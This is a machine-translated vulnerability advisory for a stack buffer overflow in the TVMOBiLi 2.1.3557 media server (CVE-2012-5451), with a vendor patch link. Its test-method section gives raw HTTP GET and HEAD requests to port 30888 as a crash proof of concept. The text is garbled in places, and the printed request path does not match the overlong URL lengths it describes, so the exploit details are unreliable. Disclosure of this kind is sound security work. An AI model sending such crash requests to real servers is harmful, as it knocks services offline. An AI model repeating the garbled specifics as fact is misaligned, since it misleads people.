TVMOBiLi length parameter inconsistency Error Handling Vulnerability

Release date:
Updated on:

Affected Systems:
TVMOBiLi 2.1.3557
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56853
CVE (CAN) ID: CVE-2012-5451

Tv1_ I is a free UPnP/DLNA Media Server on Mac, Windows, and Linux.

TVMOBiLi 2.1.3557 and earlier versions are processing "HttpUtils. dll "a security vulnerability exists when the URL length in the dynamic link library. Remote attackers can send specially crafted http get requests (161, 257, 255 characters) to port 30888/TCP, cause stack buffer overflow, causing tvMobiliService service to crash.

<* Source: High-Tech Bridge

Link: http://seclists.org/bugtraq/2012/Dec/54
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

GET
/Zookeeper
HTTP/1.1
HOST: 192.168.10.12: 30888
Referer: 192.168.10.12: 30888
ACCEPT :*/*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None

HEAD
/Zookeeper
HTTP/1.1
HOST: 192.168.10.12: 30888
Referer: 192.168.10.12: 30888
ACCEPT :*/*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

TVMOBiLi
--------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://dev.tvmobili.com/changelog.php